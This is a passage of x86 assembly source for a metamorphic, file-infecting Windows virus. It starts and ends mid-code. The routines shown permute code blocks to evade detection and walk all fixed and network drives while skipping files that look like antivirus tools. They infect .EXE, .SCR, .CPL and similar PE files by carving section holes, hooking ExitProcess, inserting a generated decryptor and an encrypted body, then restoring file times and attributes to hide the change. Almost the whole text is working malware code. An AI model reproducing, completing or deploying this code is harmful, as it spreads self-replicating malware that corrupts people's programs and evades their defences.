pop ebx mov [ebx], eax add ebx, 4 sub ecx, 4 or ecx, ecx jnz @@LoopGetNewVar ret IdentifyVariables endp ;---------------------------------------------------------------------------------------- PermutateCode proc xor eax, eax mov [ebp+NumberOfJumps], eax mov edi, [ebp+FramesTable] mov ecx, [ebp+AddressOfLastInstruction] mov eax, [ebp+InstructionTable] mov esi, eax sub ecx, eax @@NextFrame: call Random and eax, 0F0h cmp eax, 050h jb @@NextFrame add eax, 0F0h mov [edi], esi add esi, eax mov [edi+4], esi mov ebx, esi @@LoopCheckInst00: sub ebx, 10h cmp ebx, [edi] jz @@CheckInst_Next00 mov edx, [ebx] and edx, 0FFh cmp edx, 0FFh jz @@LoopCheckInst00 cmp edx, 0EAh jnz @@CheckInst_Next00 @@LoopCheckInst01: add ebx, 10h cmp ebx, [ebp+AddressOfLastInstruction] jz @@CheckInst_Next00 mov edx, [ebx] and edx, 0FFh cmp edx, 0FFh jz @@LoopCheckInst01 cmp edx, 0F6h jnz @@CheckInst_Next00 add ebx, 10h sub ebx, esi add eax, ebx add esi, ebx mov [edi+4], esi @@CheckInst_Next00: mov ebx, esi jmp @@DontAdd10hYet @@LoopCheckInst02: add ebx, 10h @@DontAdd10hYet: cmp ebx, [ebp+AddressOfLastInstruction] jz @@CheckInst_Next01 mov edx, [ebx] and edx, 0FFh cmp edx, 0FFh jz @@LoopCheckInst02 cmp edx, 0E9h jz @@CheckInst_IncludeInstruction cmp edx, 0FEh jz @@CheckInst_IncludeInstruction cmp edx, 0EBh jz @@CheckInst_IncludeInstruction cmp edx, 0EDh jz @@CheckInst_IncludeInstruction cmp edx, 70h jb @@CheckInst_Next01 cmp edx, 7Fh ja @@CheckInst_Next01 @@CheckInst_IncludeInstruction: add ebx, 10h push ebx sub ebx, esi add eax, ebx add esi, ebx mov [edi+4], esi pop ebx jmp @@DontAdd10hYet @@CheckInst_Next01: add edi, 8 sub ecx, eax cmp ecx, 01E0h jae @@NextFrame or ecx, ecx jz @@FramesCreationFinished mov [edi], esi add esi, ecx mov [edi+4], esi add edi, 8 @@FramesCreationFinished: mov [ebp+AddressOfLastFrame], edi @@TempLabel: mov eax, edi mov ebx, [ebp+FramesTable] sub eax, ebx mov ebx, 8 @@LoopCalculateMOD: shl ebx, 1 cmp ebx, eax jb @@LoopCalculateMOD sub ebx, 8 mov [ebp+MODValue], ebx mov esi, [ebp+FramesTable] mov [ebp+PositionOfFirstInstruction], esi mov edx, esi @@LoopExchange: call Random mov ebx, [ebp+MODValue] and eax, ebx add eax, esi ; ; Uncommenting this instruction the engine doesn't permutate anything ; mov eax, edx cmp eax, edi jae @@LoopExchange mov ecx, [eax] mov ebx, [edx] mov [eax], ebx mov [edx], ecx cmp edx, [ebp+PositionOfFirstInstruction] jnz @@LookEAX mov [ebp+PositionOfFirstInstruction], eax jmp @@ExchangeNext @@LookEAX: cmp eax, [ebp+PositionOfFirstInstruction] jnz @@ExchangeNext mov [ebp+PositionOfFirstInstruction], edx @@ExchangeNext: add eax, 4 add edx, 4 mov ecx, [eax] mov ebx, [edx] mov [eax], ebx mov [edx], ecx add edx, 4 cmp edx, edi jb @@LoopExchange mov esi, [ebp+InstructionTable] mov edi, [ebp+PermutationResult] mov ebx, [ebp+FramesTable] mov eax, [ebp+PositionOfFirstInstruction] cmp ebx, eax jnz @@InsertJump2 @@LoopCopyFrame: mov eax, 0FFh mov [ebp+Permut_LastInstruction], eax mov edx, [ebx] add ebx, 4 mov ecx, [ebx] add ebx, 4 @@LoopCopyInstructions: mov eax, [edx] cmp al, 4Fh jnz @@NextInstruction mov al, 51h mov [edx], eax push eax push ebx mov ebx, [edx+7] mov eax, 59h mov [ebx], al pop ebx pop eax @@NextInstruction: mov [edi], eax mov eax, [edx+4] mov [edi+4], eax mov eax, [edx+8] mov [edi+8], eax mov [edi+0Ch], edx mov [edx+0Ch], edi mov eax, [edi] and eax, 0FFh cmp eax, 0FFh jz @@NextInstruction2 @@SetLastInstruction: mov [ebp+Permut_LastInstruction], eax jmp @@NextInstruction3 @@NextInstruction2: mov eax, [edi+0Bh] and eax, 0FFh or eax, eax jnz @@SetLastInstruction @@NextInstruction3: add edi, 10h add edx, 10h cmp edx, ecx jnz @@LoopCopyInstructions mov eax, [ebp+AddressOfLastFrame] cmp ebx, eax jae @@LastFrameArrived mov eax, [ebx] cmp eax, edx jz @@LoopTestIfLastFrame @@LastFrameArrived: mov eax, [ebp+Permut_LastInstruction] cmp eax, 0E9h jz @@LoopTestIfLastFrame cmp eax, 0EBh jz @@LoopTestIfLastFrame cmp eax, 0EDh jz @@LoopTestIfLastFrame cmp eax, 0FEh jz @@LoopTestIfLastFrame mov [edi+1], edx @@InsertJump: mov eax, 0E9h mov [edi], al call InsertJumpInTable add edi, 10h @@LoopTestIfLastFrame: mov eax, [ebp+AddressOfLastFrame] cmp ebx, eax jae @@End jmp @@LoopCopyFrame @@InsertJump2: mov eax, [eax] mov [edi+1], eax jmp @@InsertJump @@End: mov [ebp+AddressOfLastInstruction], edi mov ecx, [ebp+NumberOfLabels] mov edx, [ebp+LabelTable] @@LoopUpdateLabel: mov eax, [edx+4] mov ebx, [eax+0Ch] mov [edx], ebx add edx, 8 sub ecx, 1 or ecx, ecx jnz @@LoopUpdateLabel mov ecx, [ebp+NumberOfJumps] mov ebx, [ebp+JumpsTable] jmp @@CheckNumberOfJumps @@LoopUpdateJumps: mov esi, [ebx] mov eax, [esi+1] mov edi, [eax+0Ch] mov [edx], edi mov [edx+4], eax mov [esi+1], edx mov eax, [ebp+NumberOfLabels] add eax, 1 mov [ebp+NumberOfLabels], eax add edx, 8 add ebx, 4 sub ecx, 4 @@CheckNumberOfJumps: or ecx, ecx jnz @@LoopUpdateJumps ret PermutateCode endp Random proc push edx push ecx mov eax, [ebp+RndSeed1] mov ecx, [ebp+RndSeed2] add eax, ecx call RandomMod1 xor eax, [ebp+RndSeed1] mov [ebp+RndSeed1], eax mov ecx, eax mov eax, [ebp+RndSeed2] add [ebp+RndSeed2], ecx call RandomMod2 xor eax, [ebp+RndSeed2] mov [ebp+RndSeed2], eax xor eax, [ebp+RndSeed1] call RandomMod2 pop ecx pop edx ret Random endp RandomMod1 proc mov edx, eax and edx, 1FFFh shl edx, 13h and eax, 0FFFFFE00h shr eax, 0Dh or eax, edx add eax, ecx ret RandomMod1 endp RandomMod2 proc mov edx, eax and edx, 1FFFFh shl edx, 0Fh and eax, 0FFFFE000h shr eax, 11h or eax, edx add eax, ecx ret RandomMod2 endp InsertJumpInTable proc mov ecx, [ebp+NumberOfJumps] mov edx, [ebp+JumpsTable] add edx, ecx mov [edx], edi add ecx, 4 mov [ebp+NumberOfJumps], ecx ret InsertJumpInTable endp ;---------------------------------------------------------------------------------------- InfectFiles proc call Random and eax, 3 jnz @@DontLoop @@LoopAgain: call Random and eax, 0FFh jnz @@LoopAgain @@DontLoop: xor eax, eax mov [ebp+DirectoryDeepness], eax call InfectFiles2 mov ebx, [ebp+FindFileData] add ebx, 1000h @@LoopGetDrives: xor eax, eax mov [ebp+DirectoryDeepness], eax push eax push ecx push edx mov eax, [ebp+FindFileData] add eax, 1000h push eax mov eax, 200h push eax call dword ptr [ebp+RVA_GetLogicalDriveStringsA] mov [ebp+ReturnValue], eax pop edx pop ecx pop eax mov eax, [ebp+ReturnValue] or eax, eax jz @@Error2 push eax push ecx push edx mov eax, ebx push eax call dword ptr [ebp+RVA_GetDriveTypeA] mov [ebp+ReturnValue], eax pop edx pop ecx pop eax mov eax, [ebp+ReturnValue] cmp eax, 3 jz @@InfectDrive cmp eax, 4 jnz @@NextDrive cmp eax, 6 @@InfectDrive: push eax push ecx push edx mov eax, ebx push eax call dword ptr [ebp+RVA_SetCurrentDirectoryA] mov [ebp+ReturnValue], eax pop edx pop ecx pop eax mov eax, [ebp+ReturnValue] or eax, eax jz @@Error2 push ebx call InfectFiles2 pop ebx @@NextDrive: @@LoopFindNull: add ebx, 1 mov eax, [ebx] and eax, 0FFh or eax, eax jnz @@LoopFindNull add ebx, 1 mov eax, [ebx] and eax, 0FFh or eax, eax jnz @@LoopGetDrives @@Error2: ret InfectFiles endp InfectFiles2 proc push eax push ecx push edx mov eax, [ebp+FindFileData] push eax mov edx, [ebp+OtherBuffers] push edx mov eax, '*.*' mov [edx], eax call dword ptr [ebp+RVA_FindFirstFileA] mov [ebp+ReturnValue], eax pop edx pop ecx pop eax mov eax, [ebp+ReturnValue] cmp eax, -1 jz @@Error mov [ebp+hFindFile], eax @@TouchAgain: mov edx, [ebp+FindFileData] mov eax, [edx] and eax, 10h or eax, eax jz @@TryToInfectFile mov eax, [ebp+DirectoryDeepness] cmp eax, 5 jz @@InfectNextFile mov eax, [edx+2Ch] and eax, 0FFFFFFh cmp eax, '..' jz @@InfectNextFile and eax, 0FFFFh cmp eax, '.' jz @@InfectNextFile and eax, 01Fh cmp eax, 'W' AND 1Fh jz @@InfectNextFile push eax push ecx push edx mov eax, edx add eax, 2Ch push eax call dword ptr [ebp+RVA_SetCurrentDirectoryA] mov [ebp+ReturnValue], eax pop edx pop ecx pop eax mov eax, [ebp+ReturnValue] or eax, eax jz @@InfectNextFile mov eax, [ebp+DirectoryDeepness] add eax, 1 mov [ebp+DirectoryDeepness], eax mov eax, [ebp+hFindFile] push eax call InfectFiles2 pop eax mov [ebp+hFindFile], eax mov eax, [ebp+DirectoryDeepness] sub eax, 1 mov [ebp+DirectoryDeepness], eax mov edx, [ebp+FindFileData] mov eax, '..' mov [edx], eax push eax push ecx push edx mov eax, edx push eax call dword ptr [ebp+RVA_SetCurrentDirectoryA] mov [ebp+ReturnValue], eax pop edx pop ecx pop eax mov eax, [ebp+ReturnValue] or eax, eax jz @@Error2 jmp @@InfectNextFile @@TryToInfectFile: xor eax, eax mov eax, 3 call Random and eax, 1 jnz @@InfectNextFile mov edx, [ebp+FindFileData] add edx, 2Ch mov eax, [edx] and eax, 1F1F1F1Fh cmp eax, 'itna' AND 1F1F1F1Fh jz @@InfectNextFile mov eax, [edx] and eax, 1F1Fh cmp eax, '-F' AND 1F1Fh jz @@InfectNextFile cmp eax, 'AP' AND 1F1Fh jz @@InfectNextFile cmp eax, 'CS' AND 1F1Fh jz @@InfectNextFile cmp eax, 'RD' AND 1F1Fh jz @@InfectNextFile cmp eax, 'ON' AND 1F1Fh jz @@InfectNextFile cmp eax, 'EI' AND 1F1Fh jz @@InfectNextFile cmp eax, 'XE' AND 1F1Fh jz @@InfectNextFile cmp eax, 'OW' AND 1F1Fh jz @@InfectNextFile mov ebx, edx @@LoopFindExtension: mov eax, [ebx] and eax, 01Fh cmp eax, 'V' AND 1Fh jz @@InfectNextFile cmp eax, '0' AND 1Fh or eax, eax jz @@CheckExtension add ebx, 1 jmp @@LoopFindExtension @@CheckExtension: mov eax, [ebx-4] and eax, 1F1F1FFFh cmp eax, 'EXE.' AND 1F1F1FFFh jz @@InfectFile cmp eax, 'RCS.' AND 1F1F1FFFh jz @@InfectFile cmp eax, 'TAD.' AND 1F1F1FFFh jz @@InfectFile cmp eax, 'LVO.' AND 1F1F1FFFh jz @@InfectFile cmp eax, 'LPC.' AND 1F1F1FFFh jnz @@InfectNextFile @@InfectFile: call TouchFile @@InfectNextFile: push eax push ecx push edx mov eax, [ebp+FindFileData] push eax mov eax, [ebp+hFindFile] push eax call dword ptr [ebp+RVA_FindNextFileA] mov [ebp+ReturnValue], eax pop edx pop ecx pop eax mov eax, [ebp+ReturnValue] or eax, eax jnz @@TouchAgain @@Error2: push eax push ecx push edx mov eax, [ebp+hFindFile] push eax call dword ptr [ebp+RVA_FindClose] pop edx pop ecx pop eax @@Error: ret InfectFiles2 endp PrepareFile proc mov eax, [ebp+MappingAddress] mov ebx, [eax] and ebx, 0FFFFh cmp ebx, 0+'ZM' jnz @@Error mov ebx, [eax+18h] and ebx, 0FFh cmp ebx, 40h jnz @@Error mov ebx, [eax+3Ch] add ebx, eax mov ecx, [ebx] cmp ecx, 0+'EP' jnz @@Error mov [ebp+HeaderAddress], ebx mov ecx, [ebx+58h] or ecx, ecx jnz @@Error mov ecx, [ebx+4] and ecx, 0FFFFh cmp ecx, 014Ch jz @@IA32 @@IA32: mov ecx, [ebx+6] and ecx, 0FFFFh mov edx, [ebx+14h] and edx, 0FFFFh add edx, 18h add edx, ebx mov [ebp+StartOfSectionHeaders], edx xor eax, eax mov [ebp+RelocHeader], eax mov [ebp+TextHeader], eax mov [ebp+DataHeader], eax @@LoopSections: mov eax, [edx] mov esi, [edx+4] cmp eax, 'ler.' jnz @@LookForCode cmp esi, 0+'co' jnz @@NextSection mov [ebp+RelocHeader], edx jmp @@NextSection @@LookForCode: cmp eax, 'xet.' jnz @@LookForCode2 cmp esi, 0+'t' jnz @@NextSection mov [ebp+TextHeader], edx jmp @@NextSection @@LookForCode2: cmp eax, 'EDOC' jnz @@LookForData or esi, esi jnz @@NextSection mov [ebp+TextHeader], edx jmp @@NextSection @@LookForData: cmp eax, 'tad.' jnz @@LookForData2 cmp esi, 0+'a' jnz @@NextSection mov [ebp+DataHeader], edx jmp @@NextSection @@LookForData2: cmp eax, 'ATAD' jnz @@LookForData3 or esi, esi jnz @@NextSection mov [ebp+DataHeader], edx jmp @@NextSection @@LookForData3: @@NextSection: mov [ebp+LastHeader], edx add edx, 28h dec ecx or ecx, ecx jnz @@LoopSections xor eax, eax mov [ebp+ExitProcessAddress], eax mov [ebp+VirtualAllocAddress], eax mov [ebp+GetProcAddressAddress], eax mov [ebp+GetModuleHandleAddress], eax mov eax, [ebp+TextHeader] or eax, eax jz @@Error mov eax, [ebp+DataHeader] or eax, eax jz @@Error mov eax, [ebp+RelocHeader] or eax, eax jz @@NoRelocs mov eax, 3 call Random and eax, 3 jz @@NoRelocs2 mov eax, [ebp+RelocHeader] cmp eax, [ebp+LastHeader] jnz @@Error mov eax, 1 mov [ebp+MakingFirstHole], eax mov esi, [ebp+TextHeader] mov ecx, 2000h call UpdateHeaders mov [ebp+RVA_TextHole], edi mov [ebp+Phys_TextHole], eax mov [ebp+TextHoleSize], ecx mov eax, [ebp+ExitProcessAddress] or eax, eax jz @@Error mov eax, [ebp+GetProcAddressAddress] or eax, eax jz @@Error mov eax, [ebp+GetModuleHandleAddress] or eax, eax jz @@Error mov ebx, [ebp+HeaderAddress] add [ebx+1Ch], ecx add [ebp+FileSize], ecx xor eax, eax mov [ebp+MakingFirstHole], eax mov esi, [ebp+DataHeader] mov ecx, [ebp+RoundedSizeOfNewCode] call UpdateHeaders mov [ebp+RVA_DataHole], edi mov [ebp+Phys_DataHole], eax mov ebx, [ebp+HeaderAddress] mov eax, [ebp+ExitProcessAddress] add eax, [ebx+34h] mov [ebp+ExitProcessAddress], eax mov eax, [ebp+GetProcAddressAddress] add eax, [ebx+34h] mov [ebp+GetProcAddressAddress], eax mov eax, [ebp+GetModuleHandleAddress] add eax, [ebx+34h] mov [ebp+GetModuleHandleAddress], eax mov eax, [ebp+VirtualAllocAddress] or eax, eax jz @@DontAddBaseAddress add eax, [ebp+34h] mov [ebp+VirtualAllocAddress], eax @@DontAddBaseAddress: add [ebx+20h], ecx add [ebp+FileSize], ecx mov esi, [ebp+RelocHeader] mov eax, [esi+0Ch] mov [ebx+50h], eax mov edi, [esi+14h] mov ecx, [ebp+FileSize] sub ecx, edi mov [ebp+FileSize], edi add edi, [ebp+MappingAddress] xor eax, eax @@Loop0: call Random and eax, 0FCh mov [edi], eax add edi, 4 sub ecx, 4 or ecx, ecx jnz @@Loop0 xor eax, eax mov ecx, 28h @@Loop1: mov [esi], eax add esi, 4 sub ecx, 4 or ecx, ecx jnz @@Loop1 mov [ebx+0A0h], eax mov [ebx+0A4h], eax mov eax, [ebx+06h] sub eax, 1 mov [ebx+06h], eax mov eax, [ebx+16h] or eax, 1 mov [ebx+16h], eax mov eax, 2000h mov [ebp+MaxSizeOfDecryptor], eax xor eax, eax ret @@Error: mov eax, 1 ret @@NoRelocs2: xor eax, eax mov [ebp+RelocHeader], eax @@NoRelocs: xor ecx, ecx mov edx, -1 call UpdateImports mov ecx, [ebp+HeaderAddress] mov eax, [ebp+ExitProcessAddress] or eax, eax jz @@Error add eax, [ecx+34h] mov [ebp+ExitProcessAddress], eax mov eax, [ebp+GetProcAddressAddress] or eax, eax jz @@Error add eax, [ecx+34h] mov [ebp+GetProcAddressAddress], eax mov eax, [ebp+GetModuleHandleAddress] or eax, eax jz @@Error add eax, [ecx+34h] mov [ebp+GetModuleHandleAddress], eax mov eax, [ebp+VirtualAllocAddress] or eax, eax jz @@NoVirtualAlloc add eax, [ecx+34h] mov [ebp+VirtualAllocAddress], eax @@NoVirtualAlloc: xor eax, eax call Random and eax, 07h jz @@HoleAtLastSection mov ebx, [ebp+TextHeader] mov eax, [ebx+10h] cmp eax, [ebx+08h] jae @@CheckPaddingSpace add eax, [ebx+14h] mov [ebp+Phys_TextHole], eax mov eax, [ebx+10h] add eax, [ebx+0Ch] mov [ebp+RVA_TextHole], eax mov eax, [ebx+08h] sub eax, [ebx+10h] cmp eax, 600h jb @@HoleAtLastSection cmp eax, 80000000h ja @@Error cmp eax, 2000h jbe @@TextHoleSizeOK mov eax, 2000h @@TextHoleSizeOK: mov [ebp+MaxSizeOfDecryptor], eax mov edx, ebx mov ecx, [ebp+LastHeader] @@LoopAddPhysicalSize: cmp edx, ebx jz @@NextAddPhysicalSize add [edx+14h], eax @@NextAddPhysicalSize: cmp edx, ecx jz @@EndAddPhysicalSize add edx, 28h jmp @@LoopAddPhysicalSize @@EndAddPhysicalSize: mov edx, [ebp+MappingAddress] mov edi, edx add edx, [ebx+14h] add edx, [ebx+10h] add edi, [ebp+FileSize] mov esi, edi add edi, eax add [ebx+10h], eax mov eax, 2000h add [ebp+FileSize], eax @@LoopMakePhysicalHole: call Random and eax, 0FCh sub edi, 4 sub esi, 4 mov eax, [esi] mov [edi], eax cmp edi, edx jnz @@LoopMakePhysicalHole jmp @@TextHoleMade @@HoleAtLastSection: mov ebx, [ebp+LastHeader] mov eax, [ebx+08h] add eax, [ebx+0Ch] mov [ebp+RVA_TextHole], eax mov eax, [ebx+08h] add eax, [ebx+14h] mov [ebp+Phys_TextHole], eax mov eax, 2000h mov [ebp+MaxSizeOfDecryptor], eax add [ebx+08h], eax add [ebx+10h], eax add [ebp+FileSize], eax mov eax, [ebx+24h] and eax, 0FDFFFFFFh mov [ebx+24h], eax jmp @@GetDataHole @@CheckPaddingSpace: mov eax, [ebx+08h] add eax, [ebx+0Ch] mov [ebp+RVA_TextHole], eax mov eax, [ebx+08h] add eax, [ebx+14h] mov [ebp+Phys_TextHole], eax mov eax, [ebx+10h] sub eax, [ebx+08h] mov [ebp+MaxSizeOfDecryptor], eax cmp eax, 400h jb @@HoleAtLastSection mov ecx, eax mov eax, [ebx+10h] add eax, [ebx+0Ch] cmp eax, [ebx+28h+0Ch] ja @@Error add [ebx+08h], ecx @@TextHoleMade: mov ecx, [ebp+MaxSizeOfDecryptor] mov edi, [ebp+Phys_TextHole] add edi, [ebp+MappingAddress] xor eax, eax and ecx, 0FFFFFFFCh @@LoopFillHole: call Random and eax, 0FCh mov [edi], eax add edi, 4 sub ecx, 4 or ecx, ecx jnz @@LoopFillHole mov eax, [ebx+08h] mov esi, [ebp+HeaderAddress] mov [esi+1Ch], eax @@GetDataHole: mov ebx, [ebp+LastHeader] mov eax, [ebp+RoundedSizeOfNewCode] add [ebp+FileSize], eax mov ecx, [ebx+24h] and ecx, 80000000h or ecx, ecx jnz @@Error mov ecx, [ebx+10h] add ecx, [ebx+14h] mov [ebp+Phys_DataHole], ecx mov ecx, [ebx+10h] add ecx, [ebx+0Ch] mov [ebp+RVA_DataHole], ecx add eax, [ebx+10h] mov [ebx+10h], eax mov [ebx+08h], eax @@AllHolesPrepared: mov esi, [ebp+HeaderAddress] mov eax, [ebx+0Ch] add eax, [ebx+08h] mov [esi+50h], eax mov edx, [ebp+ExitProcessAddress] mov ebx, [ebp+TextHeader] mov esi, [ebx+14h] add esi, [ebp+MappingAddress] mov ecx, [ebx+10h] sub ecx, 6 @@LoopFindExitProcess: mov eax, [esi] and eax, 0FFh cmp eax, 0FFh jnz @@NextInstruction mov eax, [esi+1] and eax, 0FFh cmp eax, 25h jz @@JMPMemFound cmp eax, 15h jnz @@NextInstruction @@JMPMemFound: mov eax, [esi+2] cmp eax, edx jnz @@NextInstruction add esi, 2 push edx mov edx, [ebp+HeaderAddress] mov edx, [edx+34h] add edx, [ebp+RVA_TextHole] call PatchExitProcess pop edx add esi, 4 @@NextInstruction: add esi, 1 sub ecx, 1 or ecx, ecx jnz @@LoopFindExitProcess xor eax, eax ret PrepareFile endp TouchFile proc mov [ebp+Addr_FilePath], edx push eax push ecx push edx push edx call dword ptr [ebp+RVA_GetFileAttributesA] mov [ebp+ReturnValue], eax pop edx pop ecx pop eax mov eax, [ebp+ReturnValue] cmp eax, -1 jz @@Error_ mov [ebp+FileAttributes], eax push eax push ecx push edx push 80h mov eax, [ebp+Addr_FilePath] push eax call dword ptr [ebp+RVA_SetFileAttributesA] mov [ebp+ReturnValue], eax pop edx pop ecx pop eax mov eax, [ebp+ReturnValue] or eax, eax jz @@Error_ push eax push ecx push edx push 0 push 0 push 3 push 0 push 0 push 0C0000000h push edx call dword ptr [ebp+RVA_CreateFileA] mov [ebp+ReturnValue], eax pop edx pop ecx pop eax mov eax, [ebp+ReturnValue] cmp eax, -1 jz @@Error mov [ebp+hFile], eax push eax push ecx push edx push 0 push eax call dword ptr [ebp+RVA_GetFileSize] mov [ebp+ReturnValue], eax pop edx pop ecx pop eax mov eax, [ebp+ReturnValue] or eax, eax jz @@Error2 mov [ebp+FileSize], eax mov [ebp+OriginalFileSize], eax push eax push ecx push edx push 0 add eax, [ebp+RoundedSizeOfNewCode] add eax, 2000h push eax push 0 push 4 push 0 mov eax, [ebp+hFile] push eax call dword ptr [ebp+RVA_CreateFileMappingA] mov [ebp+ReturnValue], eax pop edx pop ecx pop eax mov eax, [ebp+ReturnValue] or eax, eax jz @@Error2 mov [ebp+hMapping], eax push eax push ecx push edx push 0 push 0 push 0 push 0F001Fh push eax call dword ptr [ebp+RVA_MapViewOfFile] mov [ebp+ReturnValue], eax pop edx pop ecx pop eax mov eax, [ebp+ReturnValue] or eax, eax jz @@Error3 mov dword ptr [ebp+MappingAddress], eax xor eax, eax mov [ebp+NumberOfUndoActions], eax call PrepareFile or eax, eax jnz @@Error4 mov ebx, [ebp+MappingAddress] add ebx, [ebp+Phys_TextHole] mov ecx, [ebp+MaxSizeOfDecryptor] cmp ecx, 600h jbe @@SetSizeOfExpansionTo0 mov eax, 1 call Random and eax, 1 jz @@SetSizeOfExpansionTo0 mov eax, -1 jmp @@SetSizeOfExpansion @@SetSizeOfExpansionTo0: mov eax, 2 call Random and eax, 1 jz @@SetSizeOfExpansionTo1 xor eax, eax jmp @@SetSizeOfExpansion @@SetSizeOfExpansionTo1: mov eax, 1 @@SetSizeOfExpansion: mov [ebp+SizeOfExpansion], eax @@CheckWithOtherSizeOfExpansion: mov ecx, 9 @@GenerateOther: push ecx mov edi, [ebp+DecryptorPseudoCode] mov eax, [ebp+VirtualAllocAddress] push eax call MakeDecryptor pop eax mov [ebp+VirtualAllocAddress], eax pop ecx sub ecx, 1 mov eax, [ebp+SizeOfDecryptor] cmp eax, [ebp+MaxSizeOfDecryptor] jbe @@SizeOfDecryptorOK or ecx, ecx jnz @@GenerateOther mov eax, [ebp+SizeOfExpansion] cmp eax, 2 jz @@InsertExitProcess add eax, 1 mov [ebp+SizeOfExpansion], eax jmp @@CheckWithOtherSizeOfExpansion @@InsertExitProcess: mov edi, [ebp+Phys_TextHole] add edi, [ebp+MappingAddress] mov eax, 6Ah mov [edi], eax add edi, 2 mov eax, 15FFh mov [edi], eax add edi, 2 mov eax, [ebp+ExitProcessAddress] mov [edi], eax jmp @@Exit @@SizeOfDecryptorOK: mov esi, [ebp+AssembledDecryptor] mov edi, [ebp+Phys_TextHole] add edi, [ebp+MappingAddress] mov ecx, [ebp+SizeOfDecryptor] @@LoopCopyDecryptor: mov eax, [esi] mov [edi], eax add esi, 1 add edi, 1 dec ecx or ecx, ecx jnz @@LoopCopyDecryptor mov edx, 30h mov esi, [ebp+MaxSizeOfDecryptor] sub esi, [ebp+SizeOfDecryptor] and esi, 0FFFFFFFCh or esi, esi jz @@ContinueWithTheRest @@CheckAgainThePossibility: call Random and eax, 0FCh or eax, eax jz @@CheckAgainThePossibility sub edx, 1 cmp eax, esi jb @@FillRandomBytes or edx, edx jnz @@CheckAgainThePossibility jmp @@ContinueWithTheRest @@FillRandomBytes: mov ecx, eax @@LoopFillRandomBytes: call Random mov [edi], eax add edi, 4 sub ecx, 4 or ecx, ecx jnz @@LoopFillRandomBytes @@ContinueWithTheRest: mov edi, [ebp+MappingAddress] add edi, [ebp+Phys_DataHole] cmp edi, [ebp+MappingAddress] jz @@Exit mov edx, [ebp+TypeOfEncryption] mov ebx, [ebp+EncryptionKey] mov esi, [ebp+NewAssembledCode] mov ecx, [ebp+SizeOfNewCode] and ecx, 0FFFFFFFCh add ecx, 4 @@LoopEncryptCode: mov eax, [esi] or ebx, ebx jz @@NoEncryption or edx, edx jz @@ADDKey cmp edx, 1 jz @@SUBKey @@XORKey: xor eax, ebx jmp @@StoreDWORD @@ADDKey: add eax, ebx jmp @@StoreDWORD @@SUBKey: sub eax, ebx @@NoEncryption: @@StoreDWORD: mov [edi], eax add esi, 4 add edi, 4 sub ecx, 4 or ecx, ecx jnz @@LoopEncryptCode xor eax, eax mov [edi], eax @@Exit: mov ebx, [ebp+HeaderAddress] call Random and eax, 0FFFFFCh mov [ebx+58h], eax xor edi, edi jmp @@NoError @@Error4: call UndoChanges mov edi, 1 @@NoError: push eax push ecx push edx mov eax, [ebp+MappingAddress] push eax call dword ptr [ebp+RVA_UnmapViewOfFile] pop edx pop ecx pop eax jmp @@NoError3 @@Error3: mov edi, 1 @@NoError3: push eax push ecx push edx mov eax, [ebp+hMapping] push eax call dword ptr [ebp+RVA_CloseHandle] pop edx pop ecx pop eax jmp @@NoError2 @@Error2: mov edi, 1 @@NoError2: push eax push ecx push edx xor eax, eax push eax push eax or edi, edi jnz @@ThereWasAnError mov eax, [ebp+FileSize] jmp @@FixSize @@ThereWasAnError: mov eax, [ebp+OriginalFileSize] @@FixSize: push eax mov eax, [ebp+hFile] push eax call dword ptr [ebp+RVA_SetFilePointer] pop edx pop ecx pop eax push eax push ecx push edx mov eax, [ebp+hFile] push eax call dword ptr [ebp+RVA_SetEndOfFile] pop edx pop ecx pop eax @@DontFixSize: push eax push ecx push edx mov eax, [ebp+FindFileData] add eax, 14h push eax sub eax, 8 push eax sub eax, 8 push eax mov eax, [ebp+hFile] push eax call dword ptr [ebp+RVA_SetFileTime] pop edx pop ecx pop eax push eax push ecx push edx mov eax, [ebp+hFile] push eax call dword ptr [ebp+RVA_CloseHandle] pop edx pop ecx pop eax @@Error: push eax push ecx push edx mov eax, [ebp+FileAttributes] push eax mov eax, [ebp+Addr_FilePath] push eax call dword ptr [ebp+RVA_SetFileAttributesA] pop edx pop ecx pop eax @@Error_: ret TouchFile endp UpdateArrayOfRVAs proc or eax, eax jz @@UpdateArray_OK or edx, edx jz @@UpdateArray_OK push ebx mov ebx, eax call TranslateVirtualToPhysical mov eax, ebx pop ebx or eax, eax jz @@UpdateArray_Updated01 @@UpdateArrayLoop_01: cmp [eax], edi jb @@UpdateArray_Updated01 add [eax], ecx @@UpdateArray_Updated01: add eax, 4 dec edx or edx, edx jnz @@UpdateArrayLoop_01 @@UpdateArray_OK: ret UpdateArrayOfRVAs endp UpdateHeaders proc push ecx mov eax, [ebp+MakingFirstHole] or eax, eax jz @@MakingDataHole mov eax, [esi+10h] cmp eax, [esi+08h] jbe @@TextSizeOK mov [esi+08h], eax @@TextSizeOK: mov edi, [esi+0Ch] add edi, [esi+10h] push edi mov eax, [esi+14h] add eax, [esi+10h] push eax jmp @@BeginUpdates @@MakingDataHole: mov edi, [esi+0Ch] push edi mov eax, [esi+14h] push eax @@BeginUpdates: @@UpdateResources: mov eax, [ebp+HeaderAddress] mov ebx, [eax+88h] or ebx, ebx jz @@UpdateImports call TranslateVirtualToPhysical or ebx, ebx jz @@End mov eax, [ebx+0Ch] and eax, 0FFFFh mov edx, [ebx+0Eh] and edx, 0FFFFh add edx, eax or edx, edx jz @@UpdateImports mov eax, ebx add eax, 10h call UpdateResourceDir @@UpdateImports: call UpdateImports mov eax, [ebp+GetModuleHandleAddress] or eax, eax jz @@End mov eax, [ebp+GetProcAddressAddress] or eax, eax jz @@End mov eax, [ebp+ExitProcessAddress] or eax, eax jz @@End @@UpdateExports: mov eax, [ebp+HeaderAddress] mov ebx, [eax+78h] or ebx, ebx jz @@ExportsUpdated call TranslateVirtualToPhysical or ebx, ebx jz @@ExportsUpdated mov eax, [ebx+0Ch] cmp eax, edi jb @@UpdateExportsOK_01 add [ebx+0Ch], ecx @@UpdateExportsOK_01: mov eax, [ebx+1Ch] mov edx, [ebx+14h] call UpdateArrayOfRVAs mov eax, [ebx+1Ch] cmp eax, edi jb @@UpdateExportsOK_02 add [ebx+1Ch], ecx @@UpdateExportsOK_02: mov eax, [ebx+20h] mov edx, [ebx+18h] call UpdateArrayOfRVAs mov eax, [ebx+20h] cmp eax, edi jb @@UpdateExportsOK_03 add [ebx+20h], ecx @@UpdateExportsOK_03: @@ExportsUpdated: @@UpdateCodeSection: push esi mov eax, [ebp+RelocHeader] mov eax, [eax+14h] add eax, [ebp+MappingAddress] @@LoopUpdate_00: mov esi, [eax] or esi, esi jz @@AllUpdated mov edx, 8 @@LoopUpdate_01: cmp edx, [eax+4] jae @@PageUpdated add eax, edx mov ebx, [eax] sub eax, edx and 